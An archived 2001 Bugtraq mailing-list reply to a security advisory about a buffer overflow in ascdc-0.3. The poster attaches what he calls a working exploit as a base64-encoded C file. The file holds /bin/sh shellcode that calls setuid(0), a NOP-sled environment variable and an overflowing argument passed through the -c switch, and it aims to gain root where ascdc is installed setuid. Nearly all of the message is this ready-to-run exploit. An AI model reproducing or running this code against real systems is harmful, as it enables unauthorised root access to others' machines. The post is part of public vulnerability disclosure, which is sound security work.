[19584] in bugtraq
Re: ascdc Buffer Overflow Vulnerability
daemon@ATHENA.MIT.EDU (The Itch)
Sun Mar 11 12:59:55 2001
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1087674738-257111439-984170536=:30047"
Message-ID: <Pine.LNX.4.21.0103092140210.30047-200000@bse.die.ms>
Date: Fri, 9 Mar 2001 21:42:16 +0100
Reply-To: The Itch <itchie@BSE.DIE.MS>
From: The Itch <itchie@BSE.DIE.MS>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <OF3493DBD1.A261E083-ONC1256A09.003D8E22@wkit.se>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN
Content-Transfer-Encoding: QUOTED-PRINTABLE
On Thu, 8 Mar 2001 advisories@WKIT.COM wrote:
> TITLE: ascdc Buffer Overflow Vulnerability
> ADVISORY ID: WSIR-01/02-06
> DISCOVERED BY: Christer =D6berg, Wkit Security AB
> CONTACT: advisories@wkit.com, Wkit Security AB
> CLASS: Buffer Overflow
> OBJECT: ascdc (exec)
> VENDOR: Rob Malda (http://www.CmdrTaco.net)
> REMOTE: No
> LOCAL: Yes
> VULNERABLE: ascdc-0.3
>=20
>=20
Attaced is a working version of the exploit for ascdc-0.3 using the -c
switch this time.
--
- The Itch
=09http://bse.die.ms
--1087674738-257111439-984170536=:30047
Content-Type: TEXT/PLAIN; charset=X-UNKNOWN; name="ascdcx.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0103092142160.30047@bse.die.ms>
Content-Description:
Content-Disposition: attachment; filename="ascdcx.c"
LyogL3Vzci9YMTFSNi9iaW4vYXNjZGMgbG9jYWwgZXhwbG9pdC4NCiAqICh2
ZXJzaW9uOiBhc2NkYy0wLjMtMi1pMzg2KQ0KICoNCiAqIFZ1bG5lcmFiaWxp
dHkgZm91bmQgYnkgQ2hyaXN0ZXIg1mJlcmcsIFdraXQgU2VjdXJpdHkgQUIg
DQogKg0KICogPGN1dCBhbmQgcGFzdGVkIGZyb20gdGhlIGFkdmlzb3J5IHBv
c3RlZCBvbiBidWd0cmFxPiANCiAqDQogKiBUaGVyZSBhcmUgbXVsdGlwbGUg
YnVmZmVyIG92ZXJmbG93cyBpbiBhc2NkYyB0aGF0IGNhbiBiZSBleHBsb2l0
ZWQgdG8gDQogKiBnYWluIHJvb3QgaWYgaXQgaXMgaW5zdGFsbGVkIHNldHVp
ZCByb290LiBJdCBpcyBOT1QgaW5zdGFsbGVkIHNldHVpZCByb290IA0KICog
YnkgZGVmYXVsdCBidXQgYXMgdGhlIFJFQURNRSBzYXlzOg0KICogIklmIHlv
dSBpbnRlbmQgdG8gdXNlIHRoZSBhdXRvbW91bnRpbmcgZmVhdHVyZSwgeW91
IG11c3QgZWl0aGVyIHJ1biANCiAqIGFzY2RjIGFzIHJvb3Qgb3Igc2V0dWlk
IGl0LiINCiAqDQogKiBHcmVldHogZmx5IG91dCB0bzogVGFzYywgQy1tdXJk
YWgsIENhbGltb25rLCBQeXJhLCBUb3p6LCBXaWxkY295b3RlLA0KICogICAg
ICAgICAgICAgICAgICAgIEx1Y2lwaGVyLCBTY3JpcHQwciwgWmVwaHlyLCBU
aGVQaWtlLCBLbjAwcCwgQ2VyaWFsDQogKgkJICAgICAgR29vbGllIGFuZCBY
LXdhcnRlY2guDQogKg0KICogLSBUaGUgSXRjaCAvIEJzRQ0KICogLSBodHRw
Oi8vYnNlLmRpZS5tcw0KICogLSBpcmMuYXhlbmV0Lm9yZyANCiAqLw0KIA0K
I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQogDQoj
ZGVmaW5lIERFRkFVTFRfRUdHX1NJWkUgMjA0OA0KI2RlZmluZSBOT1AgMHg5
MA0KDQovKiBhZGp1c3QgaWYgbmVlZGVkLCB0aGlzIHNob3VsZCBiZSBzdWZm
aWVudCAqLw0KI2RlZmluZSBERUZBVUxUX0JVRkZFUl9TSVpFIDYwMA0KIA0K
dW5zaWduZWQgbG9uZyBnZXRfc3Aodm9pZCkNCnsNCiAgICAgICAgX19hc21f
XygibW92bCAlZXNwLCAlZWF4Iik7DQp9DQoNCmNoYXIgc2hlbGxjb2RlW10g
PQ0KICAgICAgICAiXHgzMVx4YzBceDMxXHhkYlx4YjBceDE3XHhjZFx4ODAi
DQogICAgICAgICJceGViXHgxZlx4NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4
ODhceDQ2XHgwN1x4ODlceDQ2XHgwY1x4YjBceDBiIg0KICAgICAgICAiXHg4
OVx4ZjNceDhkXHg0ZVx4MDhceDhkXHg1Nlx4MGNceGNkXHg4MFx4MzFceGRi
XHg4OVx4ZDhceDQwXHhjZCINCiAgICAgICAgIlx4ODBceGU4XHhkY1x4ZmZc
eGZmXHhmZi9iaW4vc2giOyAgDQoNCmludCBtYWluKGludCBhcmdjLCBjaGFy
ICphcmd2W10pDQp7DQogICAgICAgIGNoYXIgKmJ1ZmY7DQogICAgICAgIGNo
YXIgKmVnZzsNCiAgICAgICAgY2hhciAqcHRyOw0KICAgICAgICBsb25nICph
ZGRyX3B0cjsNCiAgICAgICAgbG9uZyBhZGRyOw0KICAgICAgICBpbnQgYnNp
emUgPSBERUZBVUxUX0JVRkZFUl9TSVpFOw0KICAgICAgICBpbnQgZWdnc2l6
ZSA9IERFRkFVTFRfRUdHX1NJWkU7DQogICAgICAgIGludCBpOw0KIA0KCWlm
KGFyZ2MgPiAxKSB7IGJzaXplID0gYXRvaShhcmd2WzFdKTsgfQ0KDQoJaWYo
IShidWZmID0gbWFsbG9jKGJzaXplKSkpDQoJew0KCQlwcmludGYoInVuYWJs
ZSB0byBhbGxvY2F0ZSBtZW1vcnkgZm9yICVkIGJ5dGVzXG4iLCBic2l6ZSk7
DQoJCWV4aXQoMSk7DQoJfQ0KDQoJaWYoIShlZ2cgPSBtYWxsb2MoZWdnc2l6
ZSkpKQ0KCXsNCgkgCXByaW50ZigidW5hYmxlIHRvIGFsbG9jYXRlIG1lbW9y
eSBmb3IgJWQgYnl0ZXNcbiIsIGVnZ3NpemUpOw0KIAkJZXhpdCgxKTsNCgl9
DQoNCiAgICAgICAgYWRkciA9IGdldF9zcCgpOw0KIA0KCXByaW50ZigiL3Vz
ci9YMTFSNi9iaW4vYXNjZGMgbG9jYWwgZXhwbG9pdC5cbiIpOw0KCXByaW50
ZigiQ29kZWQgYnkgVGhlIEl0Y2ggLyBCc0VcblxuIik7DQogICAgICAgIHBy
aW50ZigiVXNpbmcgcmV0dXJuIGFkZHJlc3M6IDB4JXhcbiIsIGFkZHIpOw0K
ICAgICAgICBwcmludGYoIlVzaW5nIGJ1ZmZlcnNpemUgICAgOiAlZFxuIiwg
YnNpemUpOw0KIA0KICAgICAgICBwdHIgPSBidWZmOw0KICAgICAgICBhZGRy
X3B0ciA9IChsb25nICopIHB0cjsgIA0KICAgICAgICBmb3IoaSA9IDA7IGkg
PCBic2l6ZTsgaSs9NCkgeyAqKGFkZHJfcHRyKyspID0gYWRkcjsgfQ0KIA0K
ICAgICAgICBwdHIgPSBlZ2c7DQogICAgICAgIGZvcihpID0gMDsgaSA8IGVn
Z3NpemUgLSBzdHJsZW4oc2hlbGxjb2RlKSAtMTsgaSsrKSANCgl7IA0KCQkq
KHB0cisrKSA9IE5PUDsgDQoJfSANCg0KCWZvcihpID0gMDsgaSA8IHN0cmxl
bihzaGVsbGNvZGUpOyBpKyspIA0KCXsgDQoJCSoocHRyKyspID0gc2hlbGxj
b2RlW2ldOw0KCX0NCg0KICAgICAgICBidWZmW2JzaXplIC0gMV0gPSAnXDAn
Ow0KICAgICAgICBlZ2dbZWdnc2l6ZSAtIDFdID0gJ1wwJzsNCiAgICAgICAg
bWVtY3B5KGVnZywgIkVHRz0iLCA0KTsNCiAgICAgICAgcHV0ZW52KGVnZyk7
DQogICAgICAgIG1lbWNweShidWZmLCAiUkVUPSIsIDQpOw0KICAgICAgICBw
dXRlbnYoYnVmZik7DQogDQogICAgICAgIHN5c3RlbSgiL3Vzci9YMTFSNi9i
aW4vYXNjZGMgLWMgJFJFVCIpOw0KIA0KICAgICAgICByZXR1cm4gMDsNCn0g
ICAgICANCg0KLyogcmVtZW1iZXIsIHRoZXJlJ3Mgbm8gY3VyZSBmb3IgQnNF
ICovDQo=
--1087674738-257111439-984170536=:30047--
